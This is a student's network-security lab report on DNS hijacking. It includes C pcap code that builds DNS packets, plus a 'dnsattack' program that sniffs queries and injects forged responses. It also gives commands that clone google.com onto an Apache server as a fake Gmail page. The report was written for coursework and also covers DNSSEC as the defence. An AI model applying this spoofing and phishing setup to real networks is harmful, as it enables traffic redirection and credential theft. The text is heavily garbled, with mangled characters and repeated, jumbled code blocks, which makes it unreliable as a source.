INTERNATIONAL UNIVERSITY School of Computer Science and Engineering LAB 2: DNS attack (Part 1 + 2) CourseNetwork Security LecturerPham Van Hau,PhD !ate24/09/2013 Duration: 180 minutes Student I!"IT"#$#%& Student name'( N)* T+I Introduction To do the DNS Hijacking attack, you need to know how to generate, capture the packets programmatically. Understand the udp, dns packet headers as well as the dns protocol The purpose of this lab is to gie you hands!on e"perience on low leel network programming. #ore precisely , you are going to create the dns re$uest and response. These will help you a lot for the ne"t lab %&. 'n general, to generate the raw packet you can use pcap library (http%))www.tcpdump.org)pcap.html &. *ibnet library http%))packetfactory.openwall.net)projects)libnet)dist)deprecated)manual)lrm.html or een the standard +' http%))en.wikipedia.org)wiki)-erkeleysockets 'n the conte"t of this lab, we use pcap library for our purpose. Seeral useful information can be found athttp%))www.tcpdump.org)pcap.html T o help you to hae an idea how the dns packet look like, on your linuxmachine • open wireshark to capture the traffic • open a terminal and e"ecute /nslookup ne"press.net0 Try to look at the different fields of the captured dns!packet and understand what they are used for. This link http%))www .networksorcery .com)enp)protocol)dns.htmis also a great source for this purpose. Part I: DNS packet generation To help you on the programming stuff, ' hae created two programs, called dns_request_gen.c and dns_response_gen.c. The programs ' sent to you are not complete. 1ou need to modify them at seeral places ( ' hae marked as /T2 -3 #2D'4'3D0&. I. DNS packe t r eq ue st #odify dns_request_gen.c to generate the dns re$uest that hae the • source #+5% +6 +7 +8 +9 +: +; • destination #+5% -6 -7 -8 -9 -: -; • source port% 9<<< • dest ination port % :8 • Tran sa ct ion 'D% ++-- • source 'address%6.7.8.9 • dest ination ' a ddress% ;. =. >.? • dns $uerry to ask the 'address of /ne"press.net0
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
IntroductionTo do the DNS Hijacking attack, you need to
know how to generate, capture the packets programmatically.
Understand the udp, dns packet headers as well as the dns protocolThe purpose of this lab is to gie you hands!on e"perience on low leel network programming. #ore
precisely, you are going to create the dns re$uest and response. These will help you a lot for the ne"t
lab %&.
'n general, to generate the raw packet you can use
int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer
count""; } // $ncrease count len&&; // +ecrease len
} // hen get to the last character dns[9]!count; // tore the final counter into the dns name buffer}
int main(int argc,char arg5[]){
char errb[1_E))G8_$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice
bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip;
u_char host; // host name to look up ip. EI 5nepress.net char de5; // network de5ice to capture. EI eth9 u_char packet[J999]; // packet is buffer to contain data
// cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,net,mask,errb) !! &!){ printf(BErrorI KsCnB,errb); eit(!); }
// set the pcap description descr ! pcap_open_li5e(de5,G8$%,!,9,errb);
// Fero out the packet =LEthernetM N L$M N L&1/+M N LpplicationM memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc
/* ????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */
struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header
u_char 3_name; // pointer chi toi 5ung dau chua 3uery_name int host_len!strlen(host); // do dai cua 3uery name chinh la so ky tu cua host name=5nepress.net co lenQ!H struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery
int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7
/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(99!99); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!9; // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource
/* +- PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class
u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */};
5oid +-_name_con5erter(charhost,chardns){ int len!strlen(host); dns[len"7]!9;
int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount
}e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len
} // hen get to the last character dns[9]!count; // tore the final counter into the dns name buffer}
// cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,net,mask,errb) !! &!){ printf(BErrorI KsCnB,errb); eit(!); }
// set the pcap description descr ! pcap_open_li5e(de5,G8$%,!,9,errb);
????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */
struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery
u_char 3_name; // +ns name in 3uery struct dns_answer dns_as; // pointer chi toi 5ung dau cua dns answer
int host_len!strlen(host); // 'ostname length int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header)(packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));
/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(9:!:9); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!htons(999!); // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource
/* +- PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class
// 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; }
// $ncrease count len&&; // +ecrease len
} // hen get to the last character dns[9]!count; // tore the final counter into the dns name buffer}
/* ???????????? 8-1&$0- 1)E&E 1'E1; 08 +, $ ???????????????? */unsigned short csum (unsigned short buf, int nwords);
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]);
unsigned short csum (unsigned short buf, int nwords){ unsigned long sum!9;
int i; %or (i!9; i -(nwords/7); i"") sum "! buf[i];
sum ! (sum $$ !() " (sum 9ffff); sum "! (sum $$ !();
return 0sum;}
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]){ unsigned short udp_protocol ! +_)0; unsigned short padding ! 9; unsigned long sum; int i;
// 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the endof packet i% (len7 '! 9){ padding !!; buff[len]!9; }
// $nitialiFe sum to Fero sum ! 9;
// um all the buffer in !( bit words %or(i!9;i -(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]);
// um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i -7;i"") sum"!ntohs((unsigned short) ip_src[i]);
char errb[1_E))G8_$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip;
u_char host; // host name to look up ip. EI 5nepress.net char de5; // network de5ice to capture. EI eth9 u_char packet[J999]; // packet is buffer to contain data
// cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,net,mask,errb) !! &!){ printf(BErrorI KsCnB,errb); eit(!); }
// Fero out the packet =LEthernetM N L$M N L&1/+M N LpplicationM memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc
/* ????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */
struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header
struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header
u_char 3_name; // pointer chi toi 5ung dau chua 3uery_name int host_len!strlen(host); // do dai cua 3uery name chinh la so ky tu cua host name=5nepress.net co lenQ!H struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery
int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header) (packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/
/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(99!99); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!9; // number of answer dns&$ auth_count!9; // number of authority
dns&$ add_count!9; // number of resource
/* +- PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class
5oid +-_name_con5erter(charhost,chardns){ int len!strlen(host); dns[len"7]!9;
int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD {
dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len
} // hen get to the last character dns[9]!count; // tore the final counter into the dns name buffer
}
/* ???????????? 8-1&$0- 1)E&E 1'E1; 08 +, $ ???????????????? */unsigned short csum (unsigned short buf, int nwords);
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]);
unsigned short csum (unsigned short buf, int nwords){ unsigned long sum!9; int i; %or (i!9; i -(nwords/7); i"") sum "! buf[i];
sum ! (sum $$ !() " (sum 9ffff); sum "! (sum $$ !();
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]){ unsigned short udp_protocol ! +_)0; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end
of packet i% (len7 '! 9){ padding !!; buff[len]!9; }
// $nitialiFe sum to Fero sum ! 9;
// um all the buffer in !( bit words %or(i!9;i -(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]);
// um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i -7;i"") sum"!ntohs((unsigned short) ip_src[i]);
// cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,net,mask,errb) !! &!){ printf(BErrorI KsCnB,errb); eit(!); }
// set the pcap description descr ! pcap_open_li5e(de5,G8$%,!,9,errb);
????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */
struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery
u_char 3_name; // +ns name in 3uery struct dns_answer dns_as; // pointer chi toi 5ung dau cua dns answer
int host_len!strlen(host); // 'ostname length int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header)(packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));
/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(9:!:9); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!htons(999!); // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource
/* +- PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class
bcopy(BCc9C9cB,dns_as&$ a_name,7); dns_as&$ a_type!htons(!); // type of the host dns_as&$ a_class!htons(!); // class bcopy(BC99C99C9!CcHB,dns_as&$ a_ttl,"); dns_as&$ a_len!htons(");
/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$ a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B);
Normal scenario:)ereafter are the steps for the user on )ost% to connect to an ,e-site. e/g/ 0"AIL
• On )ost%. user enters ,,,/ gmail/com to the -ro,ser• )ost% as1s host2 for the ip address of ,,,/gmail/com
• )ost2 returns the ip address of ,,,/google/com 3ipgoogle4 to host%• host% connects 3ipgoogle4
Attack scenario• User enters ,,,/ gmail/com to the -ro,ser/•
)ost5 sniffs the traffic on the ,ire and tries to do !NS session hi6ac1ing -7 racing against thehost2/ In fact. it tries to pro8ide a fa1e ans,er to host % 3)ost 5 returns its ip address 3ip54instead of the actual ip address of gmail3ipgoogle4 to host %4
• )ost% recei8e the fa1e ans,er from host 5 and connects to host5 3ip54 in -elie8ing that it istal1ing to ,,,/google/com
Task 1: Create a program running on host5. called dnsattac1/c. in ,hich. it• captures the net,or1 traffic and filter out the dns pac1et 3get the code from La-59part%4• creates the fa1e response pac1et ,ith the information mentioned a-o8e 3get code from La-59
part%4• sends the fa1e pac1et to host%
To help 7ou in creating the program. I sent 7ou the e:ample of dnsattac1/c program/ You need to add
the appreciate code at different palces ,here I ha8e mar1ed ;TO <E "O!I=IE!>/
Answer%Dntai_dns_attack_v1.c#include <string.h> //strlen#include <stdlib.h> //malloc#include <sys/socket.h> //you know what this is for#include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc#include <netinet/in.h>#include <unistd.h> //getpid#include <pcap.h>
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */
u_short add_count; /* number of resource entries */};
pcap_t handle; /* packet capture handle */
/* functions */5oid print_app_info(5oid);
unsigned short csum (unsigned short buf, int nwords);unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]);
unsigned short csum (unsigned short buf, int nwords){ unsigned long sum!9; int i;
sum ! (sum $$ !() " (sum 9ffff); sum "! (sum $$ !();
return 0sum;}
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned
short buff[]){ unsigned short udp_protocol ! +_)0; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the endof packet i% (len7 '! 9){ padding !!; buff[len]!9; }
//copy the content of captured packet to the new buffer ip ! (struct ip_header)(packet " $%E_E&'); bcopy(packet,new_packet,ntohs(ip&$ ip_len)"$%E_E&');
/* make sure weDre capturing on an Ethernet de5ice L7M */ i% (pcap_datalink(handle) '! +&_E-!9;G) { fprintf(stderr, BKs is not an EthernetCnB, de5); eit(ET$&_8$)E); }
result ! pcap_sendpacket (handle,new_packet,$%E_E&'"ntohs(ip&$ ip_len));
i%(result !! 9) printf(BLacket sent sucessfullyMCnB);
e#se printf(BLacket sent failureMCnB);
} e#se { printf(BLacket doesnDt sentMCnB);
}
2V
Task 2: Install a ,e-ser8er on host5. create a home page to ma1e it loo1 li1e ,,,/gmail/comAns'er: n ost2& sudo apt&3et insta## apache& sudo service apache start& cd /var/www/& sudo su root& w3et 3oo3#e.com 45 inde6.htm#
Task %: Test and ma1e sure 7our attac1 ,or1s9 On host5. run sudo /?dntai_dns_attack
Question 1: Compare the dns request and dns response with respect toa) Source MAC address and Destination MAC addressb) P source, P destinationc) source port, destination port Ans'er • !ns Re@uest 8s !ns Reponse a-out "ac Address
!equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Ip Address!equest
• Result dns re@uest and response s,ap each other a-out mac address. ip address. and port-et,een source and destination/
Question 2 " #hat is the ro$e o% &ransaction D %ie$d o% the DNS packet'
Ans'er Transaction I! is a %&9-it field identif7ing a specific !NS transaction/ The transaction I! iscreated -7 the message originator and is copied -7 the responder into its response message/ Using
the transaction I!. the !NS client can match responses to its re@uests/
Question 3: (ind a so$ution to preent dns session hi*ackin+ attack
Answer: A solution to prevent dns session hijacking attack is !""#$:The !omain Name S7stem Securit7 E:tensions 3!NSSEC4 is a suite of Internet Engineering Tas1 =orce 3IET=4 specifications for securing certain 1inds of information pro8ided -7 the !omain NameS7stem 3!NS4 as used on Internet rotocol 3I4 net,or1s/ It is a set of e:tensions to !NS ,hichpro8ide to !NS clients 3resol8ers4 origin authentication of !NS data. authenticated denial of e:istence.and data integrit7. -ut not a8aila-ilit7 or confidentialit7/ 3Bi1i4